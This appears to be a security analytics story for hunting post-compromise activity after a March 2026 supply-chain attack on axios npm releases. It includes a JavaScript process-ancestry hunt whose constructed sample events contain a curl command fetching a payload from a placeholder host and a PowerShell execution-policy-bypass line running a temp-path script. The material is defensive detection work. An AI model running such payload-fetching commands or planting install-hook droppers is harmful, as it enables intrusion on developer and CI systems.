Analytics Story: Axios Supply Chain Post Compromise

Description

Leverage searches that help you detect and investigate post-compromise activity that may follow installation of compromised axios npm releases (notably axios@1.14.1 and axios@0.30.4) and the phantom dependency plain-crypto-js@4.2.1 from the March 2026 supply chain incident documented by Huntress, Socket, Step Security, and others.

The backdoored packages used a malicious postinstall script to drop a cross-platform remote access trojan with Windows, macOS, and Linux payloads, process staging, and command-and-control beaconing. Use these analytics alongside dependency audits and EDR data to scope impact, prioritize containment, and support recovery on hosts that resolved the malicious versions during the exposure window.

Why it matters

On March 31, 2026, attackers compromised the npm account of the lead axios maintainer and published two trojanized releases: axios@1.14.1 (tagged latest) and axios@0.30.4 (tagged legacy).

The packages introduced a dependency that legitimate axios never used—plain-crypto-js@4.2.1—whose sole purpose was to run a postinstall script that downloaded and executed a cross-platform RAT.

axios is one of the most widely used JavaScript HTTP clients, so CI/CD jobs, developer workstations, and applications that ran npm install during the roughly three-hour window could have pulled the malicious builds automatically. Exposure was greatest where a caret range such as ^1.14.0 (or ^0.30.0 on the legacy line) allowed the new versions to resolve: projects with no committed lockfile, installs that regenerate or update the lockfile (npm install with an absent or out-of-sync package-lock.json, or npm update) rather than honoring it as npm ci does, and scheduled dependency-update jobs.

Infection required no end-user action: installing dependencies was enough to trigger the dropper. Reporting from Huntress and the community noted infections beginning within minutes of publication, consistent with automated pipelines and local installs resolving ^1.x or similar ranges.

The dropper used obfuscation and post-execution cleanup (for example, replacing package metadata so the plain-crypto-js folder looked benign), which makes disk evidence easy to miss and raises the value of process, script, and network telemetry for confirming compromise on a host.

After the initial drop, platform-specific tradecraft followed: scripts staged under temp paths, trusted interpreters abused to run them, and beacons sent to remote infrastructure. That activity is the post-compromise phase this story emphasizes: the move from a poisoned package install to hands-on access, reconnaissance, and persistence-style activity on Windows, macOS, or Linux endpoints. Detections aligned to this narrative help teams find execution chains even when neither axios nor npm appears in the triggering event.
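The execution-chain hunt this narrative points at, written here as an added illustration and not taken from the Splunk content or any vendor report. It walks constructed Sysmon-style process-creation events (host, pid, ppid, image, cmdline) and flags any trusted interpreter or download tool that runs content from a temp path while an npm or node process sits in its ancestry, which is the shape an install-hook dropper leaves behind whether or not axios or npm appears in the triggering event. The field names, the interpreter and temp-path lists, and the sample events are assumptions chosen for the illustration; the chain is generic and does not reproduce the actual RAT's commands.

```javascript
// Added example, not code from the Splunk analytics story or a vendor report.
// Hunts process-creation telemetry for the install-hook execution chain the
// story describes: a package-manager process whose descendants run a trusted
// interpreter or download tool against content staged in a temp directory.
"use strict";

// Assumed field names, modelled on Sysmon EventID 1 / Sysmon for Linux.
// Binaries that host an npm install (npm itself runs under node).
const PACKAGE_MANAGERS = /(^|[\\/])(node|npm|npx|yarn|pnpm)(\.exe|\.cmd)?$/i;
// Interpreters and transfer tools the listed detections care about.
const INTERPRETERS = /(^|[\\/])(sh|bash|zsh|dash|python3?|powershell|pwsh|cmd|wscript|cscript|curl|wget)(\.exe)?$/i;
// Temp locations on Linux, macOS and Windows (assumed list; extend per estate).
const TEMP_PATHS = /(\/tmp\/|\/var\/tmp\/|\/private\/tmp\/|\/var\/folders\/|\\temp\\|\\tmp\\|%temp%)/i;

function findInstallHookChains(events, maxDepth = 8) {
  // Index by host + pid so ancestry lookups stay within one host.
  const byKey = new Map(events.map((e) => [`${e.host}:${e.pid}`, e]));
  const alerts = [];
  for (const e of events) {
    if (!INTERPRETERS.test(e.image)) continue;
    if (!TEMP_PATHS.test(e.cmdline) && !TEMP_PATHS.test(e.image)) continue;
    const chain = [e];
    let cur = e;
    for (let depth = 0; depth < maxDepth; depth++) {
      const parent = byKey.get(`${cur.host}:${cur.ppid}`);
      if (!parent) break;
      chain.push(parent);
      if (PACKAGE_MANAGERS.test(parent.image)) {
        alerts.push({
          host: e.host,
          pid: e.pid,
          trigger: e.cmdline,
          // Root-to-leaf ancestry, e.g. node -> sh -> curl
          chain: chain.map((p) => p.image).reverse(),
        });
        break;
      }
      cur = parent;
    }
  }
  return alerts;
}

// Constructed events. Paths and commands are illustrative, not the RAT's.
const SAMPLE_EVENTS = [
  // Linux CI runner: npm ci -> install hook -> shell from /tmp -> curl
  { host: "build-01", pid: 100, ppid: 1,   image: "/usr/bin/bash", cmdline: "bash -lc 'npm ci'" },
  { host: "build-01", pid: 101, ppid: 100, image: "/usr/bin/node", cmdline: "node /usr/bin/npm ci" },
  { host: "build-01", pid: 102, ppid: 101, image: "/bin/sh",       cmdline: "sh -c 'node install.js'" },
  { host: "build-01", pid: 103, ppid: 102, image: "/usr/bin/node", cmdline: "node install.js" },
  { host: "build-01", pid: 104, ppid: 103, image: "/bin/sh",       cmdline: "sh /tmp/.x/run.sh" },
  { host: "build-01", pid: 105, ppid: 104, image: "/usr/bin/curl", cmdline: "curl -fsSL -o /tmp/.x/payload http://example.invalid/p" },
  // Benign: a cleanup script in /tmp with no package manager above it
  { host: "build-01", pid: 200, ppid: 1,   image: "/usr/bin/bash", cmdline: "bash /tmp/ci-cleanup.sh" },
  // Windows workstation: npm install -> cmd -> node -> powershell from %TEMP%
  { host: "dev-ws-07", pid: 500, ppid: 1,   image: "C:\\Program Files\\nodejs\\node.exe", cmdline: "node.exe npm-cli.js install" },
  { host: "dev-ws-07", pid: 501, ppid: 500, image: "C:\\Windows\\System32\\cmd.exe", cmdline: "cmd.exe /d /s /c node install.js" },
  { host: "dev-ws-07", pid: 502, ppid: 501, image: "C:\\Program Files\\nodejs\\node.exe", cmdline: "node install.js" },
  { host: "dev-ws-07", pid: 503, ppid: 502, image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    cmdline: "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\dev\\AppData\\Local\\Temp\\x.ps1" },
];

for (const a of findInstallHookChains(SAMPLE_EVENTS)) {
  console.log(`[${a.host}] pid ${a.pid}: ${a.trigger}\n    chain: ${a.chain.join(" -> ")}`);
}
```

Treating plain node as a package-manager ancestor is deliberate, because npm's own CLI runs under node and the install hook is itself a node process; on hosts that run many node services this widens the net, so scope the node match to processes whose command line contains npm, npm-cli.js, yarn or pnpm if the volume is too high.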

Organizations should treat any system that installed the known bad versions during the incident window as potentially breached: validate lockfiles and SBOMs, rotate credentials and tokens that could have been exposed on those machines, and hunt using the bundled analytics plus C2 and IOC lists from vendor advisories. Pairing these searches with asset and dependency inventory reduces blind spots where transitive JavaScript dependencies updated in the background.

Detections

Name | Technique | Type
Executables Or Script Creation In Suspicious Path | Masquerading | Anomaly
Executables Or Script Creation In Temp Path | Masquerading | Anomaly
Linux Auditd File Permission Modification Via Chmod | Linux and Mac File and Directory Permissions Modification | Anomaly
Linux Auditd Possible Access To Credential Files | /etc/passwd and /etc/shadow | Anomaly
Linux Common Process For Elevation Control | Setuid and Setgid | Hunting
Linux Ingress Tool Transfer Hunting | Ingress Tool Transfer | Hunting
MacOS LOLbin | Unix Shell | TTP
PowerShell 4104 Hunting | PowerShell | Hunting
Powershell Fileless Script Contains Base64 Encoded Content | Obfuscated Files or Information, PowerShell | TTP
PowerShell Loading DotNET into Memory via Reflection | PowerShell | Anomaly
Recon Using WMI Class | Gather Victim Host Information, PowerShell | Anomaly
Registry Keys Used For Persistence | Registry Run Keys / Startup Folder | TTP
Windows Curl Upload to Remote Destination | Ingress Tool Transfer | TTP
Windows Process Execution From ProgramData | Match Legitimate Resource Name or Location | Hunting
Windows Process Execution in Temp Dir | Create or Modify System Process, Match Legitimate Resource Name or Location | Anomaly
Windows Renamed Powershell Execution | Rename Legitimate Utilities | TTP
Windows Suspicious Process File Path | Create or Modify System Process, Match Legitimate Resource Name or Location | TTP
Wscript Or Cscript Suspicious Child Process | Process Injection, Parent PID Spoofing, Create or Modify System Process | Anomaly

Data Sources

Name | Platform | Sourcetype | Source
Cisco Network Visibility Module Flow Data | Network | cisco:nvm:flowdata | not_applicable
CrowdStrike ProcessRollup2 | Other | crowdstrike:events:sensor | crowdstrike
Linux Auditd Proctitle | Linux | auditd | auditd
Osquery Results | Other | osquery:results | osquery
Powershell Script Block Logging 4104 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 11 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 | Windows | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon for Linux EventID 1 | Linux | sysmon:linux | Syslog:Linux-Sysmon/Operational
Windows Event Log Security 4688 | Windows | XmlWinEventLog | XmlWinEventLog:Security

References


Source: GitHub | Version: 1